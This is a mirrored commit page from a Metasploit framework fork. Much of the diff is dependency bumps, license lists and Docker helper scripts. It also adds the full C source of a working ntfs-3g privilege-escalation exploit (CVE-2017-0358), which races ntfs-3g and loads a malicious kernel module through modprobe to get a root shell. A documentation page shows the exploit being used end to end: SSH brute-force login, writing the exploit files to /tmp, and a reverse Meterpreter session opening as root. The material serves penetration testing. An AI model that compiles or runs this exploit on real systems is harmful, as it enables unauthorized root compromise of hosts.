infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into KB-for-rails_webconsole_v2

bug/bundler_fix
h00die 2017-04-10 20:03:03 -04:00 committed by GitHub
parent 64aecb59a1 a1a1a0a426
commit 376e791131
35 changed files with 1278 additions and 248 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.github/PULL_REQUEST_TEMPLATE.md vendored
View File

@ -11,4 +11,5 @@ List the steps needed to make sure this thing works
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

2
.ruby-version
View File

@ -1 +1 @@
2.3.3
2.4.1

3
.travis.yml
View File

@ -11,7 +11,10 @@ addons:
- graphviz
language: ruby
rvm:
- '2.1'
- '2.2'
- '2.3.3'
- '2.4.1'
env:
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true

14
Gemfile
View File

@ -3,11 +3,12 @@ source 'https://rubygems.org'
# spec.add_runtime_dependency '<name>', [<version requirements>]
gemspec name: 'metasploit-framework'
gem 'bit-struct', git: 'https://github.com/busterb/bit-struct', branch: 'ruby-2.4'
gem 'method_source', git: 'https://github.com/banister/method_source', branch: 'master'
# separate from test as simplecov is not run on travis-ci
group :coverage do
# code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
gem 'simplecov'
end
@ -17,14 +18,9 @@ group :development do
# generating documentation
gem 'yard'
# for development and testing purposes
gem 'pry'
gem 'pry', git: 'https://github.com/pry/pry', branch: 'master'
# module documentation
gem 'octokit', '~> 4.0'
# session aggregator, native builds have issues on arm platforms for now
gem 'metasploit-aggregator' if [
'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
gem 'octokit'
end
group :development, :test do

80
Gemfile.lock
View File

@ -1,7 +1,30 @@
GIT
remote: https://github.com/banister/method_source
revision: 6dcb116e37e20e58f615ffe05a40bbe9a536e44a
branch: master
specs:
method_source (0.8.1)
GIT
remote: https://github.com/busterb/bit-struct
revision: 707133ae6af5420be6fbe29be6baa5fbc929da2e
branch: ruby-2.4
specs:
bit-struct (0.15.0)
GIT
remote: https://github.com/pry/pry
revision: 1f64463184e0a160d0b41d1a1f92b8e2f230278c
branch: master
specs:
pry (0.10.4)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
PATH
remote: .
specs:
metasploit-framework (4.14.8)
metasploit-framework (4.14.10)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -11,6 +34,7 @@ PATH
jsobfu
json
metasm
metasploit-aggregator
metasploit-concern
metasploit-credential
metasploit-model
@ -104,7 +128,6 @@ GEM
thor (~> 0.19)
bcrypt (3.1.11)
bindata (2.3.5)
bit-struct (0.15.0)
builder (3.2.3)
capybara (2.13.0)
addressable
@ -142,7 +165,7 @@ GEM
factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0)
railties (>= 3.0.0)
faraday (0.11.0)
faraday (0.12.0.1)
multipart-post (>= 1.2, < 3)
ffi (1.9.18)
filesize (0.1.1)
@ -157,7 +180,7 @@ GEM
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.2.0)
grpc (1.2.2)
google-protobuf (~> 3.1)
googleauth (~> 0.5.1)
i18n (0.8.1)
@ -204,7 +227,6 @@ GEM
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.1.8)
method_source (0.8.2)
mime-types (3.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2016.0521)
@ -217,10 +239,10 @@ GEM
nessus_rest (0.1.6)
net-ssh (4.1.0)
network_interface (0.0.1)
nexpose (5.3.2)
nexpose (6.0.0)
nokogiri (1.7.1)
mini_portile2 (~> 2.1.0)
octokit (4.6.2)
octokit (4.7.0)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
@ -235,10 +257,6 @@ GEM
activerecord (>= 4.0.0)
arel (>= 4.0.1)
pg_array_parser (~> 0.0.9)
pry (0.10.4)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
slop (~> 3.4)
public_suffix (2.0.5)
rack (1.6.5)
rack-test (0.6.3)
@ -263,48 +281,48 @@ GEM
redcarpet (3.4.0)
rex-arch (0.1.4)
rex-text
rex-bin_tools (0.1.1)
rex-bin_tools (0.1.2)
metasm
rex-arch
rex-core
rex-struct2
rex-text
rex-core (0.1.8)
rex-encoder (0.1.2)
rex-core (0.1.9)
rex-encoder (0.1.3)
metasm
rex-arch
rex-text
rex-exploitation (0.1.11)
rex-exploitation (0.1.12)
jsobfu
metasm
rex-arch
rex-encoder
rex-text
rex-java (0.1.3)
rex-mime (0.1.3)
rex-java (0.1.4)
rex-mime (0.1.4)
rex-text
rex-nop (0.1.0)
rex-arch
rex-ole (0.1.4)
rex-ole (0.1.5)
rex-text
rex-powershell (0.1.69)
rex-powershell (0.1.70)
rex-random_identifier
rex-text
rex-random_identifier (0.1.1)
rex-random_identifier (0.1.2)
rex-text
rex-registry (0.1.1)
rex-rop_builder (0.1.1)
rex-registry (0.1.2)
rex-rop_builder (0.1.2)
metasm
rex-core
rex-text
rex-socket (0.1.3)
rex-socket (0.1.5)
rex-core
rex-sslscan (0.1.2)
rex-sslscan (0.1.3)
rex-socket
rex-text
rex-struct2 (0.1.0)
rex-text (0.2.13)
rex-zip (0.1.1)
rex-struct2 (0.1.1)
rex-text (0.2.14)
rex-zip (0.1.2)
rex-text
rkelly-remix (0.0.7)
robots (0.10.1)
@ -347,7 +365,6 @@ GEM
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
simplecov-html (0.10.0)
slop (3.6.0)
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.19.4)
@ -367,13 +384,14 @@ PLATFORMS
DEPENDENCIES
aruba
bit-struct!
cucumber-rails
factory_girl_rails
fivemat
metasploit-aggregator
metasploit-framework!
octokit (~> 4.0)
pry
method_source!
octokit
pry!
rake
redcarpet
rspec-rails

171
LICENSE
View File

@ -19,19 +19,6 @@ Files: data/templates/to_mem_pshreflection.ps1.template
Copyright: 2012, Matthew Graeber
License: BSD-3-clause
Files: data/john/*
Copyright: 1996-2011 Solar Designer.
License: GPL-2
Files: external/pcaprub/*
Copyright: 2007-2008, Alastair Houghton
License: LGPL-2.1
Files: external/ruby-kissfft/*
Copyright: 2003-2010 Mark Borgerding
2009-2012 H D Moore <hdm[at]rapid7.com>
License: BSD-3-clause
Files: external/source/exploits/IE11SandboxEscapes/*
Copyright: James Forshaw, 2014
License: GPLv3
@ -79,38 +66,18 @@ Files: lib/anemone.rb lib/anemone/*
Copyright: 2009 Vertive, Inc.
License: MIT
Files: lib/bit-struct.rb lib/bit-struct/*
Copyright: 2005-2009, Joel VanderWerf
License: Ruby
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
Copyright: 2006-2010 Yoann GUILLOT
License: LGPL-2.1
Files: lib/nessus/*
Copyright: Vlatoko Kosturjak
License: BSD-3-clause
Files: lib/net/dns.rb lib/net/dns/*
Copyright: 2006 Marco Ceresa
License: Ruby
Files: lib/net/ssh.rb lib/net/ssh/*
Copyright: 2008 Jamis Buck <jamis@37signals.com>
License: MIT
Files: lib/packetfu.rb lib/packetfu/*
Copyright: 2008-2012 Tod Beardsley
License: BSD-3-clause
Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
Copyright: 2005 Michael Neumann
License: BSD-3-clause or Ruby
Files: lib/openvas/*
Copyright: No copyright statement provided
License: MIT
Files: lib/rabal/*
Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
License: Ruby
@ -119,22 +86,10 @@ Files: lib/rbmysql.rb lib/rbmysql/*
Copyright: 2009 tommy
License: Ruby
Files: lib/rbreadline.rb
Copyright: 2009 Park Heesob
License: BSD-3-clause
Files: lib/rkelly/*
Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette
License: MIT
Files: lib/snmp.rb lib/snmp/*
Copyright: 2004, David R. Halliday
License: Ruby
Files: lib/sshkey.rb lib/sshkey/*
Copyright: 2011 James Miller
License: MIT
Files: lib/windows_console_color_support.rb
Copyright: 2011 Michael 'mihi' Schierl
License: BSD-3-clause
@ -151,132 +106,6 @@ Files: data/webcam/api.js
Copyright: Copyright 2013 Muaz Khan<@muazkh>.
License: MIT
#
# Gems
#
Files: activemodel
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activerecord
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activesupport
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: arel
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: bcrypt
Copyright: 2007-2011 Coda Hale
License: MIT
Files: builder
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: database_cleaner
Copyright: 2009 Ben Mabey
License: MIT
Files: diff-lcs
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: factory_girl
Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
License: MIT
Files: fivemat
Copyright: 2012 Tim Pope
License: MIT
Files: i18n
Copyright: 2008 The Ruby I18n team
License: MIT
Files: json
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: metasploit_data_models
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: mini_portile
Copyright: 2011 Luis Lavena
License: MIT
Files: msgpack
Copyright: Austin Ziegler
License: Ruby
Files: multi_json
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: network_interface
Copyright: 2012, Rapid7, Inc.
License: MIT
Files: nokogiri
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: packetfu
Copyright: 2008-2012 Tod Beardsley
License: BSD-3-clause
Files: pcaprub
Copyright: 2007-2008, Alastair Houghton
License: LGPL-2.1
Files: pg
Copyright: 1997-2012 by the authors
License: Ruby
Files: rake
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: redcarpet
Copyright: 2009 Natacha Porté
License: MIT
Files: robots
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: rspec
Copyright: 2009 Chad Humphries, David Chelimsky
License: MIT
Files: shoulda-matchers
Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
License: MIT
Files: simplecov
Copyright: 2010-2012 Christoph Olszowka
License: MIT
Files: timecop
Copyright: 2012 Travis Jeffery, John Trupiano
License: MIT
Files: tzinfo
Copyright: 2005-2006 Philip Ross
License: MIT
Files: yard
Copyright: 2007-2013 Loren Segal
License: MIT
License: BSD-2-clause
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

131
LICENSE_GEMS Normal file
View File

@ -0,0 +1,131 @@
actionpack, 4.2.8, MIT
actionview, 4.2.8, MIT
activemodel, 4.2.8, MIT
activerecord, 4.2.8, MIT
activesupport, 4.2.8, MIT
addressable, 2.5.1, "Apache 2.0"
arel, 6.0.4, MIT
arel-helpers, 2.3.0, unknown
aruba, 0.14.2, MIT
bcrypt, 3.1.11, MIT
bindata, 2.3.5, ruby
bit-struct, 0.15.0, ruby
builder, 3.2.3, MIT
bundler, 1.14.6, MIT
capybara, 2.13.0, MIT
childprocess, 0.5.9, MIT
coderay, 1.1.1, MIT
contracts, 0.15.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.4.5, MIT
cucumber-wire, 0.0.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
docile, 1.1.5, MIT
erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT
faraday, 0.12.0.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT
gherkin, 4.1.1, MIT
google-protobuf, 3.2.0.2, "New BSD"
googleauth, 0.5.1, "Apache 2.0"
grpc, 1.2.2, "New BSD"
i18n, 0.8.1, MIT
jsobfu, 0.4.2, "New BSD"
json, 2.0.3, ruby
jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT
logging, 2.2.0, MIT
loofah, 2.0.3, MIT
memoist, 0.15.0, MIT
metasm, 1.0.3, LGPL
metasploit-aggregator, 0.1.3, "New BSD"
metasploit-concern, 2.0.3, "New BSD"
metasploit-credential, 2.0.8, "New BSD"
metasploit-framework, 4.14.9, "New BSD"
metasploit-model, 2.0.3, "New BSD"
metasploit-payloads, 1.2.19, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD"
metasploit_payloads-mettle, 0.1.8, "3-clause (or ""modified"") BSD"
method_source, 0.8.1, MIT
mime-types, 3.1, MIT
mime-types-data, 3.2016.0521, MIT
mini_portile2, 2.1.0, MIT
minitest, 5.10.1, MIT
msgpack, 1.1.0, "Apache 2.0"
multi_json, 1.12.1, MIT
multi_test, 0.1.2, MIT
multipart-post, 2.0.0, MIT
nessus_rest, 0.1.6, MIT
net-ssh, 4.1.0, MIT
network_interface, 0.0.1, MIT
nexpose, 6.0.0, BSD
nokogiri, 1.7.1, MIT
octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT
os, 0.9.6, MIT
packetfu, 1.1.13.pre, BSD
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1
pg, 0.20.0, "New BSD"
pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT
pry, 0.10.4, MIT
public_suffix, 2.0.5, MIT
rack, 1.6.5, MIT
rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.8, MIT
rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT
rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD
recog, 2.1.5, unknown
redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD"
rex-bin_tools, 0.1.2, "New BSD"
rex-core, 0.1.9, "New BSD"
rex-encoder, 0.1.3, "New BSD"
rex-exploitation, 0.1.12, "New BSD"
rex-java, 0.1.4, "New BSD"
rex-mime, 0.1.4, "New BSD"
rex-nop, 0.1.0, unknown
rex-ole, 0.1.5, "New BSD"
rex-powershell, 0.1.70, "New BSD"
rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.2, "New BSD"
rex-rop_builder, 0.1.2, "New BSD"
rex-socket, 0.1.5, "New BSD"
rex-sslscan, 0.1.3, "New BSD"
rex-struct2, 0.1.1, "New BSD"
rex-text, 0.2.14, "New BSD"
rex-zip, 0.1.2, "New BSD"
rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT
rspec-core, 3.5.4, MIT
rspec-expectations, 3.5.0, MIT
rspec-mocks, 3.5.0, MIT
rspec-rails, 3.5.2, MIT
rspec-support, 3.5.0, MIT
ruby_smb, 0.0.8, "New BSD"
rubyntlm, 0.6.1, MIT
rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
signet, 0.7.3, "Apache 2.0"
simplecov, 0.14.1, MIT
simplecov-html, 0.10.0, MIT
sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT
thor, 0.19.4, MIT
thread_safe, 0.3.6, "Apache 2.0"
timecop, 0.8.1, MIT
tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.1, BSD
xpath, 2.0.0, unknown
yard, 0.9.8, MIT

196
data/exploits/CVE-2017-0358/sploit.c Normal file
View File

@ -0,0 +1,196 @@
#define _GNU_SOURCE
#include <stdbool.h>
#include <errno.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <err.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/eventfd.h>
#include <signal.h>
#include <poll.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <string.h>
#include <sys/wait.h>
#include <time.h>
#include <sys/utsname.h>
int main(void) {
/* prevent shell from backgrounding ntfs-3g when stopped */
pid_t initial_fork_child = fork();
if (initial_fork_child == -1)
err(1, "initial fork");
if (initial_fork_child != 0) {
int status;
if (waitpid(initial_fork_child, &status, 0) != initial_fork_child)
err(1, "waitpid");
execl("rootshell", "rootshell", NULL);
exit(0);
}
char buf[1000] = {0};
// Set up workspace with volume, mountpoint, modprobe config and module directory.
char template[] = "/tmp/ntfs_sploit.XXXXXX";
if (mkdtemp(template) == NULL)
err(1, "mkdtemp");
char volume[100], mountpoint[100], modprobe_confdir[100], modprobe_conffile[100];
sprintf(volume, "%s/volume", template);
sprintf(mountpoint, "%s/mountpoint", template);
sprintf(modprobe_confdir, "%s/modprobe.d", template);
sprintf(modprobe_conffile, "%s/sploit.conf", modprobe_confdir);
if (mkdir(volume, 0777) || mkdir(mountpoint, 0777) || mkdir(modprobe_confdir, 0777))
err(1, "mkdir");
int conffd = open(modprobe_conffile, O_WRONLY|O_CREAT, 0666);
if (conffd == -1)
err(1, "open modprobe config");
int suidfile_fd = open("rootshell", O_RDONLY);
if (suidfile_fd == -1)
err(1, "unable to open ./rootshell");
char modprobe_config[200];
sprintf(modprobe_config, "alias fuse rootmod\noptions rootmod suidfile_fd=%d\n", suidfile_fd);
if (write(conffd, modprobe_config, strlen(modprobe_config)) != strlen(modprobe_config))
errx(1, "modprobe config write failed");
close(conffd);
// module directory setup
char system_cmd[1000];
sprintf(system_cmd, "mkdir -p %s/lib/modules/$(uname -r) && cp rootmod.ko *.bin %s/lib/modules/$(uname -r)/",
template, template);
if (system(system_cmd))
errx(1, "shell command failed");
// Set up inotify watch for /proc/mounts.
// Note: /proc/mounts is a symlink to /proc/self/mounts, so
// the watch will only see accesses by this process.
int inotify_fd = inotify_init1(IN_CLOEXEC);
if (inotify_fd == -1)
err(1, "unable to create inotify fd?");
if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
err(1, "unable to watch /proc/mounts");
// Set up inotify watch for /proc/filesystems.
// This can be used to detect whether we lost the race.
int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
if (fs_inotify_fd == -1)
err(1, "unable to create inotify fd?");
if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
err(1, "unable to watch /proc/filesystems");
// Set up inotify watch for /sbin/modprobe.
// This can be used to detect when we can release all our open files.
int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
if (modprobe_inotify_fd == -1)
err(1, "unable to create inotify fd?");
if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
err(1, "unable to watch /sbin/modprobe");
int do_exec_pipe[2];
if (pipe2(do_exec_pipe, O_CLOEXEC))
err(1, "pipe");
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child != 0) {
if (read(do_exec_pipe[0], buf, 1) != 1)
errx(1, "pipe read failed");
char modprobe_opts[300];
sprintf(modprobe_opts, "-C %s -d %s", modprobe_confdir, template);
setenv("MODPROBE_OPTIONS", modprobe_opts, 1);
execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
}
child = getpid();
// Now launch ntfs-3g and wait until it opens /proc/mounts
if (write(do_exec_pipe[1], buf, 1) != 1)
errx(1, "pipe write failed");
if (read(inotify_fd, buf, sizeof(buf)) <= 0)
errx(1, "inotify read failed");
if (kill(getppid(), SIGSTOP))
err(1, "can't stop setuid parent");
// Check whether we won the main race.
struct pollfd poll_fds[1] = {{
.fd = fs_inotify_fd,
.events = POLLIN
}};
int poll_res = poll(poll_fds, 1, 100);
if (poll_res == -1)
err(1, "poll");
if (poll_res == 1) {
puts("looks like we lost the race");
if (kill(getppid(), SIGKILL))
perror("SIGKILL after lost race");
char rm_cmd[100];
sprintf(rm_cmd, "rm -rf %s", template);
system(rm_cmd);
exit(1);
}
puts("looks like we won the race");
// Open as many files as possible. Whenever we have
// a bunch of open files, move them into a new process.
int total_open_files = 0;
while (1) {
#define LIMIT 500
int open_files[LIMIT];
bool reached_limit = false;
int n_open_files;
for (n_open_files = 0; n_open_files < LIMIT; n_open_files++) {
open_files[n_open_files] = eventfd(0, 0);
if (open_files[n_open_files] == -1) {
if (errno != ENFILE)
err(1, "eventfd() failed");
printf("got ENFILE at %d total\n", total_open_files);
reached_limit = true;
break;
}
total_open_files++;
}
pid_t fd_stasher_child = fork();
if (fd_stasher_child == -1)
err(1, "fork (for eventfd holder)");
if (fd_stasher_child == 0) {
prctl(PR_SET_PDEATHSIG, SIGKILL);
// close PR_SET_PDEATHSIG race window
if (getppid() != child) raise(SIGKILL);
while (1) pause();
}
for (int i = 0; i < n_open_files; i++)
close(open_files[i]);
if (reached_limit)
break;
}
// Wake up ntfs-3g and keep allocating files, then free up
// the files as soon as we're reasonably certain that either
// modprobe was spawned or the attack failed.
if (kill(getppid(), SIGCONT))
err(1, "SIGCONT");
time_t start_time = time(NULL);
while (1) {
for (int i=0; i<1000; i++) {
int efd = eventfd(0, 0);
if (efd == -1 && errno != ENFILE)
err(1, "gapfiller eventfd() failed unexpectedly");
}
struct pollfd modprobe_poll_fds[1] = {{
.fd = modprobe_inotify_fd,
.events = POLLIN
}};
int modprobe_poll_res = poll(modprobe_poll_fds, 1, 0);
if (modprobe_poll_res == -1)
err(1, "poll");
if (modprobe_poll_res == 1) {
puts("yay, modprobe ran!");
exit(0);
}
if (time(NULL) > start_time + 3) {
puts("modprobe didn't run?");
exit(1);
}
}
}

11
docker/README.md
View File

@ -22,6 +22,13 @@ ln -s `pwd`/docker/bin/msfconsole $HOME/bin/
ln -s `pwd`/docker/bin/msfvenom $HOME/bin/
```
If you set the environment variable `MSF_BUILD` the container will be rebuilt.
```bash
MSF_BUILD=1 ./docker/bin/msfconsole
MSF_BUILD=1 ./docker/bin/msfconsole-dev
```
### But I want reverse shells...
By default we expose port `4444`. You'll need to set `LHOST` to be a hostname/ip
@ -55,7 +62,7 @@ Now you should be able get reverse shells working
## Developing
To setup you environment for development, you need to `docker/docker-compose.development.override.yml`
To setup you environment for development, you need to add `docker/docker-compose.development.override.yml`
to your `COMPOSE_FILE` environment variable.
If you don't have a `COMPOSE_FILE` environment variable, you can set it up with this:
@ -63,3 +70,5 @@ If you don't have a `COMPOSE_FILE` environment variable, you can set it up with
```bash
echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.development.override.yml" >> .env
```
Alternatively you can also use the `msfconsole-dev` binstub.

5
docker/bin/msfconsole
View File

@ -18,4 +18,9 @@ if [[ -z "$MSF_PATH" ]]; then
fi
cd $MSF_PATH
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml build
fi
docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@"

27
docker/bin/msfconsole-dev Executable file
View File

@ -0,0 +1,27 @@
#! /bin/bash
if [[ -z "$MSF_PATH" ]]; then
path=`dirname $0`
# check for ./docker/msfconsole.rc
if [[ ! -f $path/../msfconsole.rc ]] ; then
# we are not inside the project
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
fi
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@"

2
docker/docker-compose.development.override.yml
View File

@ -6,4 +6,4 @@ services:
DATABASE_URL: postgres://postgres@db:5432/msf_dev
volumes:
- .:/usr/src/app
- .:/usr/src/metasploit-framework

264
documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md Normal file
View File

@ -0,0 +1,264 @@
## Creating A Testing Environment
We have to live compile on the host, so `make` and `gcc` are required. Easiest thing to do is: `apt-get install build-essential`.
As per notes from the original EDB module, if you're in a VM, you should use **at least two CPU cores**. This was confirmed during testing of this module as well.
This module has been tested against:
1. Ubuntu 16.04 with ntfs-3g 1:2015.3.14AR.1-1build1
2. Ubuntu 16.10 with ntfs-3g 1:2016.2.22AR.1-3
3. Debian Jessie 8 (8.7.1, had to downgrade ntfs-3g to vuln version, and install kernel headers): `apt-get install ntfs-3g=1:2014.2.15AR.2-1+deb8u2 linux-headers-$(uname -r)`
This module was not tested against, but may work against:
1. Debian 7
2. Debian 9
3. Other Debian based systems
## Verification Steps
1. Start msfconsole
2. Exploit a box via whatever method
4. Do: `use exploit/linux/local/ntfs3_priv_esc`
5. Do: `set session #`
6. Do: `set verbose true`
7. Do: `exploit`
## Options
**WritableDir**
A folder we can write files to. Defaults to /tmp
## Scenarios
### Ubuntu 16.04 (ntfs-3g 1:2015.3.14AR.1-1build1)
#### Initial Access
resource (ntfs3g.rc)> use auxiliary/scanner/ssh/ssh_login
resource (ntfs3g.rc)> set rhosts 192.168.2.137
rhosts => 192.168.2.137
resource (ntfs3g.rc)> set username ubuntu
username => ubuntu
resource (ntfs3g.rc)> set password ubuntu
password => ubuntu
resource (ntfs3g.rc)> exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.117:40371 -> 192.168.2.137:22) at 2017-02-24 21:33:59 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
#### Escalate
resource (ntfs3g.rc)> use exploit/linux/local/ntfs3g_priv_esc
resource (ntfs3g.rc)> set verbose true
verbose => true
resource (ntfs3g.rc)> set session 1
session => 1
resource (ntfs3g.rc)> set target 1
target => 1
resource (ntfs3g.rc)> set lhost 192.168.2.117
lhost => 192.168.2.117
resource (ntfs3g.rc)> check
[!] SESSION may not be compatible with this module.
[+] Vulnerable Ubuntu 16.04 detected
[*] The target appears to be vulnerable.
resource (ntfs3g.rc)> exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.2.117:4444
[+] Vulnerable Ubuntu 16.04 detected
[+] make is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing files to target
[*] Writing rootshell to /tmp/rootshell.c
[*] Max line length is 65537
[*] Writing 345 bytes in 1 chunks of 1198 bytes (octal-encoded), using printf
[*] Writing sploit to /tmp/sploit.c
[*] Max line length is 65537
[*] Writing 7632 bytes in 1 chunks of 26966 bytes (octal-encoded), using printf
[*] Writing rootmod to /tmp/rootmod.c
[*] Max line length is 65537
[*] Writing 1115 bytes in 1 chunks of 4016 bytes (octal-encoded), using printf
[*] Writing Makefile to /tmp/Makefile
[*] Max line length is 65537
[*] Writing 18 bytes in 1 chunks of 66 bytes (octal-encoded), using printf
[*] Writing payload to /tmp/KggJEFqa
[*] Max line length is 65537
[*] Writing 206 bytes in 1 chunks of 567 bytes (octal-encoded), using printf
[*] Starting execution of priv esc.
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (2440248 bytes) to 192.168.2.137
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:53144) at 2017-02-24 21:34:25 -0500
[!] This exploit may require manual cleanup of '/tmp/rootshell.c' on the target
[!] This exploit may require manual cleanup of '/tmp/rootshell' on the target
[!] This exploit may require manual cleanup of '/tmp/sploit.c' on the target
[!] This exploit may require manual cleanup of '/tmp/sploit' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.c' on the target
[!] This exploit may require manual cleanup of '/tmp/Makefile' on the target
[!] This exploit may require manual cleanup of '/tmp/KggJEFqa' on the target
meterpreter > sysinfo
Computer : 192.168.2.137
OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)
Architecture : x64
Meterpreter : x64/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
### Ubuntu 16.10 (ntfs-3g 1:2016.2.22AR.1-3)
#### Initial Access
[*] Processing ntfs3g.rc for ERB directives.
resource (ntfs3g.rc)> use auxiliary/scanner/ssh/ssh_login
resource (ntfs3g.rc)> set rhosts 192.168.2.197
rhosts => 192.168.2.197
resource (ntfs3g.rc)> set username ubuntu
username => ubuntu
resource (ntfs3g.rc)> set password ubuntu
password => ubuntu
resource (ntfs3g.rc)> exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lxd),115(lpadmin),116(sambashare) Linux ubuntu1610 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
